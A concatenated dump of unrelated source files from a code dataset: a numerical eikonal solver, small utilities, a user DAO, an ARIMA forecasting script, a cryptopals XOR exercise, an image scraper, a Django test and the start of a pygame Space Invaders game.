self._olimdd.interior_olim.U[imax, jmax]\n U0 = (1 - tx)*U00 + tx*U10\n U1 = (1 - tx)*U01 + tx*U11\n return (1 - ty)*U0 + ty*U1\n\n def __call__(self, *p):\n if self._olimdd.surf.phi(*p) <= 0:\n return np.nan\n if any(\n is_boundary(self._olimdd.interior_olim, ind)\n for ind in self._olimdd.grid.get_nearest_inds(p)\n ):\n return self._interp_boundary_layer(*p)\n else:\n return self._interp_interior(*p)\n\n def get_bilinear_interpolator(self):\n return np.vectorize(self.BilinearInterpolator(self))\n\n def get_surface_points(self):\n phi = self.phi(*self.boundary_layer_points.T)\n inds, = np.where(np.abs(phi) < _tol)\n return self.boundary_layer_points[inds, :]\n\n def get_diffraction_sources(self):\n if not self.shadow:\n raise Exception('''calling `get_diffraction_sources` only makes\nsense when solving for the numerical shadow''')\n # First, grab the vertices from the underlying surface and\n # determine which lie outside of the shadow zone\n vertices = get_vertices(self.surf)\n nn = self.get_nearest_neighbor_interpolator(ignore_surface=True)\n shadow = nn(*vertices.T)\n inds_light = np.where(shadow == 0)[0]\n diff_srcs = vertices[inds_light, :]\n # We also need to know the indices of the corresponding points\n # in `boundary_layer_points`. This is an awful way to do this,\n # but we can get it going, least\n diff_inds = []\n for src in diff_srcs:\n error = np.abs(self.boundary_layer_points - src)\n inds = np.where(np.all(error < _tol, axis=1))[0]\n if inds.size != 1:\n raise Exception('inconsistent vertices')\n ind = inds[0]\n diff_inds.append(ind)\n diff_inds = np.array(diff_inds)\n return diff_srcs, diff_inds\n\n def _get_parent_for_interior_ind(self, ind):\n U, ind0, ind1, lam = get_minimizer(self.interior_olim, ind)\n if ind in self.interior_to_boundary_layer:\n ind_ = self.interior_to_boundary_layer[ind]\n U_,ind0_,ind1_,lam_ = get_minimizer(self.boundary_layer_olim, ind_)\n if U_ < U:\n return ind0_, ind1_, lam_\n return ind0, ind1, lam\n\n def _get_parent_for_boundary_layer_ind(self, ind):\n U, ind0, ind1, lam = get_minimizer(self.boundary_layer_olim, ind)\n if ind in self.boundary_layer_to_interior:\n ind_ = self.boundary_layer_to_interior[ind]\n U_, ind0_, ind1_, lam_ = get_minimizer(self.interior_olim, ind_)\n if U_ < U:\n return ind0_, ind1_, lam_\n return ind0, ind1, lam\n\n # TODO: kind of a silly name, but we need to distinguish this somehow\n # TODO: what distinguishes this from regular old `_get_parent`?\n def _get_parent_ind_for_bilinear_vertex(self, x):\n ind0, ind1, lam = self._get_parent(x)\n if ind0 is None:\n return None\n if ind1 is None:\n assert lam is None\n if isinstance(ind0, int):\n ind = self.grid.get_ind(self.boundary_layer_olim.nodes[ind0])\n else:\n if ind0 is None:\n import pdb; pdb.set_trace()\n ind = ind0 if isinstance(ind0, tuple) else tuple(ind0)\n else:\n if isinstance(ind0, int):\n assert isinstance(ind1, int)\n assert lam is not None\n ind0 = self.grid.get_ind(self.boundary_layer_olim.nodes[ind0])\n ind1 = self.grid.get_ind(self.boundary_layer_olim.nodes[ind1])\n ind = tuple((1 - lam)*np.array(ind0) + lam*np.array(ind1))\n if not (self.phi(*self.grid[ind]) + _tol >= 0):\n import pdb; pdb.set_trace()\n assert self.phi(*self.grid[ind]) + _tol >= 0\n return ind\n\n def _get_parent_partially_grid_aligned(self, x, inds=None, lam=None):\n if self.ndim != 2:\n raise Exception('''\nTODO: implement `_get_parent_partially_grid_aligned in 3D''')\n\n if inds is None:\n x0, x1, lam = self.grid.get_bilinear_combination(*x)\n else:\n assert lam is not None\n assert len(inds) == 2*(self.ndim - 1) # TODO: I think?\n if isinstance(inds[0], int):\n assert all(isinstance(ind, int) for ind in inds)\n x0 = self.boundary_layer_points[inds[0]]\n x1 = self.boundary_layer_points[inds[1]]\n elif isinstance(inds[0], tuple):\n assert all(isinstance(ind, tuple) for ind in inds)\n x0 = self.grid[inds[0]]\n x1 = self.grid[inds[1]]\n else:\n raise Exception('inds of invalid type %s' % type(inds[0]))\n\n # If x0 or x1 are inside the boundary surface, then we use a\n # rootfinder to \"project\" that point onto the surface\n phi0, phi1 = self.phi(*x0), self.phi(*x1)\n if phi1 + _tol < 0:\n assert phi0 >= 0\n phi0, phi1 = phi1, phi0\n x0, x1 = x1, x0\n lam = 1 - lam\n if phi0 + _tol < 0:\n f = lambda t: self.phi(*((1 - t)*x0 + t*x1))\n t = brentq(f, 0, 1)\n assert 0 < t and t < 1\n x0 = (1 - t)*x0 + t*x1\n\n return (\n self._get_parent_ind_for_bilinear_vertex(x0),\n self._get_parent_ind_for_bilinear_vertex(x1),\n lam\n )\n\n def _get_surface_convex_combination(self, x):\n '''For a point `x`, which we assume lies somewhere on the surface\ndefined by `self.phi`, find the nearest surface points which can serve\nas vertices in a convex combination expressing `x` (i.e., there are\nsome convex coefficients T and surface points P such that x = P@T).\n\n '''\n r = (1.5 + _tol)*self.h\n inds = self._boundary_layer_kdtree.query_ball_point(x, r, np.inf)\n points = self.boundary_layer_points[inds, :]\n pairs, dists, lams = [], [], []\n for i, p_i in enumerate(points):\n if abs(self.phi(*p_i)) > _tol:\n continue\n for j in range(i):\n p_j = points[j]\n if abs(self.phi(*p_j)) > _tol:\n continue\n dp = p_j - p_i\n if np.linalg.norm(dp) < _tol:\n raise Exception('bad stencil')\n nonzero = np.where(abs(dp) > _tol)[0]\n ts = (x - p_i)[nonzero]/dp[nonzero]\n if len(ts) > 1 and any(\n abs(t - ts[0]) > np.sqrt(_tol) for t in ts[1:]\n ):\n continue\n t = ts[0]\n if t < 0 or t > 1:\n continue\n pairs.append((i, j))\n dists.append(np.linalg.norm(dp))\n lams.append(t)\n if len(dists) > 0:\n argmin = np.argmin(dists)\n argpair = pairs[argmin]\n return [inds[i] for i in argpair], lams[argmin]\n else:\n return [], None\n\n def _get_parent(self, x, x_prev=None):\n # First, check and see if `x` corresponds to a source point on\n # the surface\n d, ind_ = self._boundary_layer_kdtree.query(x)\n if d < _tol and ind_ in self.boundary_layer_olim.srcs:\n return None, None, None\n\n # TODO: comment case\n if d < _tol:\n return self._get_parent_for_boundary_layer_ind(ind_)\n\n # TODO: comment case\n if self.grid.is_grid_aligned(*x):\n ind = self.grid.get_nearest_ind(*x)\n if get_state(self.interior_olim, ind) != pyolim.State.BOUNDARY:\n return self._get_parent_for_interior_ind(ind)\n else:\n import pdb; pdb.set_trace()\n raise Exception('trying to get parent for boundary node')\n\n # TODO: comment case\n if abs(self.phi(*x)) < _tol:\n inds, lam = self._get_surface_convex_combination(x)\n if all(ind in self.boundary_layer_olim.srcs for ind in inds):\n return None, None, None\n else:\n return self._get_parent_partially_grid_aligned(\n x, inds=inds, lam=lam\n )\n\n # TODO: comment case\n if self.grid.is_partially_grid_aligned(*x):\n return self._get_parent_partially_grid_aligned(x)\n\n # TODO: comment case\n if x_prev is not None:\n x = self.grid.shoot_onto_first_grid_line(x_prev, x)\n return self._get_parent(x, x_prev)\n\n raise Exception(\n '''TODO: add support for points which are neither partially\n grid-aligned nor coincident with boundary layer points''')\n\n def _shoot_point_onto_surface(self, x0, x1):\n points = [\n self.boundary_layer_points[ind]\n for ind in self._boundary_layer_kdtree.query_ball_point(\n x1, (1 + _tol)*self.h, np.inf\n )\n ]\n dx = x1 - x0\n f = lambda t: self.phi(*(x0 + t*dx))\n f0, f2 = f(_tol), f(2)\n if f0 <= 0:\n import pdb; pdb.set_trace()\n assert f0 > 0\n if f2 <= 0 and any(abs(self.phi(*p)) < _tol for p in points):\n t = brentq(f, _tol, 2)\n x = x0 + t*dx\n assert abs(self.phi(*x)) < _tol\n return x\n\n def get_parent(self, x, x_prev=None):\n ind0, ind1, lam = self._get_parent(x, x_prev)\n if ind0 is None:\n return\n elif ind1 is None:\n if isinstance(ind0, tuple):\n xp = self.grid[ind0]\n else:\n xp = self.boundary_layer_olim.nodes[ind0]\n else:\n if isinstance(ind0, tuple):\n x0, x1 = self.grid[ind0], self.grid[ind1]\n xp = (1 - lam)*x0 + lam*x1\n else:\n x0 = self.boundary_layer_olim.nodes[ind0]\n x1 = self.boundary_layer_olim.nodes[ind1]\n xp = (1 - lam)*x0 + lam*x1\n # Some corrections which are helpful\n if self.phi(*x) > _tol:\n xp_shoot = self._shoot_point_onto_surface(x, xp)\n if xp_shoot is not None:\n xp = xp_shoot\n elif self.grid.is_subgrid(*xp) and abs(self.phi(*xp)) > _tol:\n xp = self.grid.shoot_onto_first_grid_line(x, xp)\n # Sometimes we'll *just* miss the surface obliquely---we want\n # to ensure that we \"numerically\" hit it if we can\n try:\n d, ind = self._boundary_layer_kdtree.query(xp)\n except:\n import pdb; pdb.set_trace()\n if d < self.h**2:\n xp_new = self.boundary_layer_points[ind]\n # Don't want to accidentally get stuck on the boundary\n if np.linalg.norm(xp_new - x) > _tol:\n xp = xp_new\n assert not isinstance(xp, tuple)\n return tuple(xp)\n\n def trace_characteristic(self, x, debug=False):\n phi = self.phi(*x)\n if phi + _tol < 0:\n raise Exception(\"%s does not lie in domain (phi = %g)\" % (x, phi))\n if not isinstance(x, tuple):\n x = tuple(x)\n if debug:\n print(x)\n xs = [x]\n x = self.get_parent(xs[-1], xs[-2] if len(xs) > 1 else None)\n while x is not None:\n if debug:\n print(x)\n xs.append(x)\n x = self.get_parent(xs[-1], xs[-2] if len(xs) > 1 else None)\n return np.array(xs)\n\n def get_bl_ind_from_vert_ind(self, ind):\n return self._vert_ind_to_bl_ind[ind]","sub_path":"dd.py","file_name":"dd.py","file_ext":"py","file_size_in_byte":40515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"10976601","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\n\n\ndef load_data(filepath):\n if not os.path.exists(filepath):\n return None\n\n with open(filepath) as json_file:\n return json.load(json_file)\n\n\ndef pretty_print_json(data, indent=4):\n return json.dumps(data, indent=indent, ensure_ascii=False)\n\n\ndef main():\n description = \"Pretty print for JSON\"\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument(\n \"-f\", \"--filepath\",\n required=True,\n help=\"Input file\"\n )\n parser.add_argument(\n \"-i\", \"--indent\",\n help=\"Indentation size. Default: 4\",\n default=4,\n type=int\n )\n\n args = parser.parse_args()\n\n data = load_data(args.filepath)\n print(\n pretty_print_json(data, args.indent)\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pprint_json.py","file_name":"pprint_json.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"652708262","text":"import datetime\nfrom app import db\nfrom app.model.usermodel import User\n\nclass UserDao:\n @staticmethod\n def save_user(user):\n db.session.add(user)\n db.session.commit()\n db.session.refresh(user)\n return user\n\n @staticmethod\n def update_user(user):\n existing_user = UserDao.get_by_id(user.id)\n if user.firstname:\n existing_user.fistname = user.firstname\n \n if user.lastname:\n existing_user.lastname = user.lastname\n\n if user.email:\n existing_user.email = user.email\n\n if user.street:\n existing_user.street = user.street\n\n if user.city:\n existing_user.city = user.city\n\n if user.state:\n existing_user.state = user.state \n\n if user.zipcode:\n existing_user.zipcode = user.zipcode \n \n db.session.commit()\n db.session.refresh(existing_user)\n return existing_user \n\n @staticmethod\n def get_all():\n return User.query.all()\n\n @staticmethod\n def get_by_email(email_data):\n return User.query.filter_by(email=email_data).first() \n","sub_path":"app/dao/userdao.py","file_name":"userdao.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"343569376","text":"\"\"\"\nAuthor: Jing (https://github.com/gnijuohz)\n\nFlatten Binary Tree to Linked List: https://oj.leetcode.com/problems/flatten-binary-tree-to-linked-list \n\n\nGiven a binary tree, flatten it to a linked list in-place.\n\n\n\nFor example,\nGiven\n\n 1\n / \\\n 2 5\n / \\ \\\n 3 4 6\n\n\n\nThe flattened tree should look like:\n\n 1\n \\\n 2\n \\\n 3\n \\\n 4\n \\\n 5\n \\\n 6\n\n\nclick to show hints.\n\nHints:\nIf you notice carefully in the flattened tree, each node's right child points to the next node of a pre-order traversal. \nTags\nTree, Depth-first Search \n\"\"\"\n\n# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return nothing, do it in place\n def flatten(self, root):\n while root:\n if root.left:\n node = root.left\n while node.right:\n node = node.right\n node.right = root.right\n root.right = root.left\n root.left = None\n root = root.right","sub_path":"solutions/Flatten-Binary-Tree-to-Linked-List.py","file_name":"Flatten-Binary-Tree-to-Linked-List.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259262769","text":"from pandas import read_csv\nfrom pandas import datetime\nfrom matplotlib import pyplot\n\ndef parser(x):\n\treturn datetime.strptime('202'+x, '%Y-%m-%d')\n \nseries = read_csv('https://raw.githubusercontent.com/ll-cooool-j/DS-Assignment/main/Datasets/Datasets%20for%20ARIMA%20(Only%20Date%20%2B%20Infected)/Vietnam%20(Date%20%2B%20Infected).csv', header=0, parse_dates=[0], index_col=0, squeeze=True, date_parser=parser)\nprint(series.head())\nseries.plot()\npyplot.show()\n\nseries.max()\n\nseries.min()\n\nfrom matplotlib import pyplot\nfrom pandas.plotting import autocorrelation_plot\nautocorrelation_plot(series)\npyplot.show()\n\n# grid search ARIMA parameters for time series\nimport warnings\nimport pandas as pd\nfrom math import sqrt\nfrom pandas import read_csv\nfrom pandas import datetime\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\n\n# evaluate an ARIMA model for a given order (p,d,q)\ndef evaluate_arima_model(X, arima_order):\n X = X.astype('float64')\n # prepare training dataset\n train_size= int(len(X) * 0.2)\n point = int(len(X) * 0.8)\n train, test = X[0:train_size], X[train_size:]\n history = [x for x in train]\n\n # make predictions\n predictions = list()\n for t in range(len(test)):\n model = ARIMA(history, order=arima_order)\n model_fit = model.fit()\n yhat = model_fit.forecast()[0]\n predictions.append(yhat)\n history.append(test[t])\n # calculate out of sample error\n rmse = sqrt(mean_squared_error(test, predictions))\n return rmse\n \n# evaluate combinations of p, d and q values for an ARIMA model\ndef evaluate_models(dataset, p_values, d_values, q_values):\n\tdataset = dataset.astype('float32')\n\tbest_score, best_cfg = float(\"inf\"), None\n\tfor p in p_values:\n\t\tfor d in d_values:\n\t\t\tfor q in q_values:\n\t\t\t\torder = (p,d,q)\n\t\t\t\ttry:\n\t\t\t\t\trmse = evaluate_arima_model(dataset, order)\n\t\t\t\t\tif rmse < best_score:\n\t\t\t\t\t\tbest_score, best_cfg = rmse, order\n\t\t\t\t\tprint('ARIMA%s RMSE=%.3f' % (order,rmse))\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\tprint('Best ARIMA%s RMSE=%.3f' % (best_cfg, best_score))\n \n# load dataset\nidx = pd.date_range(\"2020-07-01\", periods=335)\nseries.index = idx.to_period()\n# evaluate parameters\np_values = range(0, 5)\nd_values = range(0, 3)\nq_values = range(0, 3)\nwarnings.filterwarnings(\"ignore\")\nevaluate_models(series.values, p_values, d_values, q_values)\n\n# fit an ARIMA model and plot residual errors\nfrom pandas import DataFrame\n# fit model\nseries = series.astype('float64')\nmodel = ARIMA(series, order=(3,2,0))\nmodel_fit = model.fit()\n# summary of fit model\nprint(model_fit.summary())\n# line plot of residuals\nresiduals = DataFrame(model_fit.resid)\nresiduals.plot()\npyplot.show()\n# density plot of residuals\nresiduals.plot(kind='kde')\npyplot.show()\n# summary stats of residuals\nprint(residuals.describe())\n\n# evaluate an ARIMA model using a walk-forward validation\nfrom pandas import read_csv\nfrom pandas import datetime\nfrom matplotlib import pyplot\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport numpy as np\nimport itertools\nfrom itertools import chain\nX = series.values.astype('float64')\n# prepare training dataset\ntrain_size= int(len(X) * 0.2)\npoint = int(len(X) * 0.8)\ntrain, test = X[0:train_size], X[point:]\nhistory = [x for x in train]\npredictions = list()\n# walk-forward validation\nfor t in range(len(test)):\n\tmodel = ARIMA(history, order=(3,2,0))\n\tmodel_fit = model.fit()\n\toutput = model_fit.forecast()\n\tyhat = output[0]\n\tpredictions.append(yhat)\n\tobs = test[t]\n\thistory.append(obs)\n\tprint('predicted=%f, expected=%f' % (yhat, obs))\n# evaluate forecasts\nrmse = sqrt(mean_squared_error(test, predictions))\nprint('Test RMSE: %.3f' % rmse)\n# plot forecasts against actual outcomes\npyplot.plot(test)\npyplot.plot(predictions, color='red')\npyplot.show()","sub_path":"Models/Version 3/ARIMA/vietnam.py","file_name":"vietnam.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281157631","text":"from db import get_connection, get_from_datamaster\nfrom db.tables import traits\n\nrequirements = [traits]\n\n\ndef build():\n datamaster = get_from_datamaster(\"EquipTraits.csv\")\n trait_rows_with_elements_by_text = {\n row[\"Text\"]: row\n for row in datamaster\n if row[\"TraitPropertyName\"] == \"Element\"}\n\n with get_connection() as con:\n cur = con.cursor()\n\n cur.execute(\"SELECT ElementName, Id FROM Elements\")\n element_ids_by_name = {cur_row[0]: cur_row[1]\n for cur_row in cur.fetchall()}\n\n cur.execute(\"DROP TABLE IF EXISTS TraitElements\")\n cur.execute(\"CREATE TABLE TraitElements(\"\n \"Id INTEGER PRIMARY KEY AUTOINCREMENT, \"\n \"Trait INTEGER, \"\n \"Element INTEGER, \"\n \"FOREIGN KEY(Trait) REFERENCES Traits(Id) ,\"\n \"FOREIGN KEY(Element) REFERENCES Elements(Id))\")\n\n for trait in traits.read():\n text = trait[\"text\"]\n trait_row_from_datamaster = trait_rows_with_elements_by_text.get(text)\n if trait_row_from_datamaster:\n trait_id = trait[\"id\"]\n element_id = element_ids_by_name[\n trait_row_from_datamaster[\n \"TraitPropertyValue\"]]\n cur.execute(\"INSERT INTO TraitElements (\"\n \"Trait, Element) \"\n \"VALUES (\\\"{}\\\", \\\"{}\\\")\".format(\n trait_id, element_id))\n","sub_path":"db/tables/trait_elements.py","file_name":"trait_elements.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"335734455","text":"import requests\nfrom urllib.parse import urlencode\nfrom requests.exceptions import RequestException\nimport json\nimport pymongo\nfrom bs4 import BeautifulSoup\nimport re\nfrom config import *\nimport os\nfrom hashlib import md5\nfrom multiprocessing import Pool\n\nclient = pymongo.MongoClient(MONGO_URL)\ndb = client[MONGO_DB]\n\ndef get_image_index(offset,keyword):\n data = {\n 'offset': offset,\n 'format': 'json',\n 'keyword': keyword,\n 'autoload': 'true',\n 'count': '20',\n 'cur_tab': '3',\n 'from': 'search_tab'\n }\n url = 'https://www.toutiao.com/search_content/?' + urlencode(data)\n print(url)\n try:\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n print('解析出错')\n return None\n\ndef parse_image_url(html):\n data = json.loads(html)\n if data and 'data' in data.keys():\n for item in data.get('data'):\n yield item.get('article_url')\n\ndef get_image_detail(url):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n print('请求详情页解析出错')\n return None\n\ndef parse_page_detail(html,url):\n soup = BeautifulSoup(html,'lxml')\n title = soup.select('title')[0].get_text()\n image_pattern = re.compile('gallery: JSON.parse\\((.*?)\\)',re.S)\n result = re.search(image_pattern, html)\n if result:\n res = json.loads(json.loads(result.group(1)))\n if res and 'sub_images' in res:\n sub_images = res.get('sub_images')\n images = [ item.get('url') for item in sub_images]\n return {\n 'title': title,\n 'url': url,\n 'images': images\n }\ndef save_to_mongo(result):\n if db[MONGO_TABLE].insert(result):\n print('存储到mongoDB',result)\n return True\n return False\n\n\n\ndef save_image(url):\n print('正在下载', url)\n try:\n response = requests.get(url)\n if response.status_code == 200:\n content = response.content\n except RequestException:\n print('下载图片出错', url)\n file_path = '{0}/{1}.{2}'.format(os.getcwd(),md5(content).hexdigest(),'jpg')\n if not os.path.exists(file_path):\n with open(file_path,'wb') as f:\n f.write(content)\n f.close()\n\ndef main(offset):\n html = get_image_index(offset, '街拍')\n for url in parse_image_url(html):\n detail = get_image_detail(url)\n if detail:\n result = parse_page_detail(detail, url)\n if result:\n save_to_mongo(result)\n for item in result['images']:\n save_image(item)\n\n\nif __name__ == '__main__':\n groups = [x*20 for x in range(GROUP_START,GROUP_END)]\n pool = Pool()\n pool.map(main,groups)\n \n","sub_path":"jinri.py","file_name":"jinri.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"42275508","text":"# Set 1 Challenge 3\n# Single-byte XOR cipher\n\nfrom MyCrypto import MyCrypto\n\nimport binascii\n\nmcrypt = MyCrypto()\n\n# Given string\ninputString = \"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"\n# Convert string to bytes object\nba = binascii.unhexlify(inputString)\n\n# Initialize loop variables\nhighestScore = 0\nscoreIndex = 0\nhighestBytes = \"\"\nfor x in range(256):\n\t# Xor the byte array with a byte between 0-256\n\toutputBytes = mcrypt.singleByteXor(ba, bytes([x]))\n\t# Calculate a english-language \"score\" for the string. Function assumes\n\t# This byte array is ascii encoded.\n\tscore = mcrypt.scoreBytesAsAscii(outputBytes)\n\tif score > highestScore:\n\t\thighestScore = score\n\t\tscoreIndex = x\n\t\thighestBytes = outputBytes\n\n# Print results\nprint(\"Single byte with best score: 0x%x\" % scoreIndex)\nprint(\"Resulting Bytes: %s\" % highestBytes)\n","sub_path":"py/solutions/challenge03.py","file_name":"challenge03.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256303164","text":"import glob\nimport json\nimport requests\nimport shutil\nimport time\n\nfrom datetime import timedelta, datetime\nfrom django.test import TransactionTestCase, tag\nfrom django.utils import timezone\nfrom unittest.mock import patch, Mock\nfrom test.support import EnvironmentVarGuard # Python >=3\n\nfrom data_refinery_common.models import (\n Organism,\n ComputationalResult,\n ComputationalResultAnnotation,\n ComputedFile,\n DownloaderJob,\n DownloaderJobOriginalFileAssociation,\n Experiment,\n ExperimentAnnotation,\n ExperimentSampleAssociation,\n OriginalFile,\n OriginalFileSampleAssociation,\n ProcessorJob,\n ProcessorJobOriginalFileAssociation,\n Sample,\n SampleAnnotation,\n SampleComputedFileAssociation,\n SampleResultAssociation,\n SurveyJob,\n SurveyJobKeyValue,\n)\nfrom data_refinery_common.utils import get_env_variable\nfrom data_refinery_foreman.surveyor import surveyor, utils\nfrom data_refinery_foreman.surveyor.management.commands.unsurvey import purge_experiment\n\n# Import and set logger\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\nLOCAL_ROOT_DIR = get_env_variable(\"LOCAL_ROOT_DIR\", \"/home/user/data_store\")\nLOOP_TIME = 5 # seconds\nMAX_WAIT_TIME = timedelta(minutes=15)\n\ndef wait_for_job(job, job_class: type, start_time: datetime):\n \"\"\"Monitors the `job_class` table for when `job` is done.\"\"\"\n job = job_class.objects.filter(id=job.id).get()\n while job.success is None and timezone.now() - start_time < MAX_WAIT_TIME:\n logger.info(\"Still polling the %s.\",\n job_class.__name__)\n time.sleep(LOOP_TIME)\n job = job_class.objects.filter(id=job.id).get()\n\n if timezone.now() - start_time > MAX_WAIT_TIME:\n logger.error(\"%s job timed out!\", job_class.__name__)\n\n return job\n\n\n# TransactionTestCase makes database calls complete before the test\n# ends. Otherwise the workers wouldn't actually be able to find the\n# job in the database because it'd be stuck in a transaction.\nclass NoOpEndToEndTestCase(TransactionTestCase):\n @tag(\"slow\")\n def test_no_op(self):\n \"\"\"Survey, download, then process an experiment we know is NO_OP.\"\"\"\n # Clear out pre-existing work dirs so there's no conflicts:\n\n self.env = EnvironmentVarGuard()\n self.env.set('RUNING_IN_CLOUD', 'False')\n with self.env:\n for work_dir in glob.glob(LOCAL_ROOT_DIR + \"/processor_job_*\"):\n shutil.rmtree(work_dir)\n\n # Make sure there are no already existing jobs we might poll for unsuccessfully.\n DownloaderJobOriginalFileAssociation.objects.all().delete()\n DownloaderJob.objects.all().delete()\n ProcessorJobOriginalFileAssociation.objects.all().delete()\n ProcessorJob.objects.all().delete()\n\n # Prevent a call being made to NCBI's API to determine\n # organism name/id.\n organism = Organism(name=\"HOMO_SAPIENS\", taxonomy_id=9606, is_scientific_name=True)\n organism.save()\n\n accession_code = \"E-GEOD-3303\"\n survey_job = surveyor.survey_experiment(accession_code, \"ARRAY_EXPRESS\")\n\n self.assertTrue(survey_job.success)\n\n downloader_jobs = DownloaderJob.objects.all()\n self.assertGreater(downloader_jobs.count(), 0)\n\n logger.info(\"Survey Job finished, waiting for Downloader Jobs to complete.\")\n start_time = timezone.now()\n for downloader_job in downloader_jobs:\n downloader_job = wait_for_job(downloader_job, DownloaderJob, start_time)\n self.assertTrue(downloader_job.success)\n\n processor_jobs = ProcessorJob.objects.all()\n self.assertGreater(processor_jobs.count(), 0)\n\n logger.info(\"Downloader Jobs finished, waiting for processor Jobs to complete.\")\n start_time = timezone.now()\n for processor_job in processor_jobs:\n processor_job = wait_for_job(processor_job, ProcessorJob, start_time)\n self.assertTrue(processor_job.success)\n\n # Test that the unsurveyor deletes all objects related to the experiment\n purge_experiment(accession_code)\n\n self.assertEqual(Experiment.objects.all().count(), 0)\n self.assertEqual(ExperimentAnnotation.objects.all().count(), 0)\n self.assertEqual(ExperimentSampleAssociation.objects.all().count(), 0)\n self.assertEqual(Sample.objects.all().count(), 0)\n self.assertEqual(SampleAnnotation.objects.all().count(), 0)\n self.assertEqual(OriginalFile.objects.all().count(), 0)\n self.assertEqual(OriginalFileSampleAssociation.objects.all().count(), 0)\n self.assertEqual(SampleResultAssociation.objects.all().count(), 0)\n self.assertEqual(ComputationalResult.objects.all().count(), 0)\n self.assertEqual(ComputationalResultAnnotation.objects.all().count(), 0)\n self.assertEqual(SampleComputedFileAssociation.objects.all().count(), 0)\n self.assertEqual(ComputedFile.objects.all().count(), 0)\n self.assertEqual(DownloaderJob.objects.all().count(), 0)\n self.assertEqual(DownloaderJobOriginalFileAssociation.objects.all().count(), 0)\n self.assertEqual(ProcessorJob.objects.all().count(), 0)\n self.assertEqual(ProcessorJobOriginalFileAssociation.objects.all().count(), 0)\n","sub_path":"foreman/data_refinery_foreman/surveyor/test_end_to_end.py","file_name":"test_end_to_end.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"161394420","text":"import itertools\nimport math\n\n\ndef issquare(n):\n if int(math.sqrt(n)) * int(math.sqrt(n)) == n:\n return True\n else:\n return False\n\n\ndef isvalid(l):\n temp = []\n for i in range(len(l) - 1):\n temp.append(int(l[i]) + int(l[i+1]))\n\n for i in range(len(temp)):\n if not issquare(temp[i]):\n return False\n return True\n\n\nl = input().split(',')\n\nvalids = list(itertools.permutations(l))\ns = []\n\nfor i in range(len(valids)):\n if not valids[i] in s:\n s.append(valids[i])\n\nl1 = []\nfor i in range(len(s)):\n if isvalid(s[i]):\n l1.append(s[i])\n\nprint(len(l1))\n\n\n\n\n\n\n","sub_path":"Code/CodeRecords/2360/60691/274040.py","file_name":"274040.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"525960728","text":"def bubble_sort(A):\n \"\"\"\n Sort sequence of numbers by swapping adjacent elements out of order.\n\n Parameters\n ----------\n A : array-like of shape (n.)\n Sequence of numbers.\n \n Returns\n -------\n A : array-like of shape (n,)\n Sorted sequence of numbers.\n \"\"\"\n # Loop through array ending at 2nd to last element.\n for i in range(len(A) - 1):\n\n # For each element loop backwards through array.\n for j in range(len(A) - 1, i, -1):\n\n # Check whether adjacent elements are out of order.\n if A[j] < A[j - 1]:\n\n # Swap elements.\n A[j], A[j - 1] = A[j - 1], A[j]\n\n return A","sub_path":"algos/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406580899","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 22 17:00:55 2020\n\n@author: prudh\n\"\"\"\n\nimport pygame\nimport random\nimport math\nimport os\nimport neat\nfrom pygame import mixer\nimport time\nimport visualize\nimport pickle\nimport threading\n\n\n\n#Initializing pygame\npygame.init()\n\n#initializing the screen\nscreen = pygame.display.set_mode((800,600))\n\n#Titile & Icon\npygame.display.set_caption(\"Space Invaders\")\nicon = pygame.image.load(\"alien.png\")\npygame.display.set_icon(icon)\n\n#score\nscore_value = 0\nfont = pygame.font.Font('freesansbold.ttf',45)\n\ntextX = 300\ntextY = 20\n\ngame_over = pygame.font.Font('freesansbold.ttf',65)\n\ndef display_font(x,y):\n score = font.render(\"Score:\" + str(score_value),True,(255,255,255))\n screen.blit(score,(x,y))\n \ndef display_gameover():\n over = game_over.render(\"Game Over\",True,(255,255,255))\n screen.blit(over,(250,280))\n\n#Background\nbackground = pygame.image.load(\"background.png\")\n\n#Background sound\n#mixer.music.load(\"background.wav\")\n#mixer.music.play(-1)\n\n#player\nplayerimg = pygame.image.load(\"space-invaders.png\")\nplayerimg = pygame.transform.scale(playerimg, (45, 45))\n\nplayerX = 350\nplayerY = 500\nplayerX_change = 0\n\ndef player(x,y):\n screen.blit(playerimg,(x,y))\n 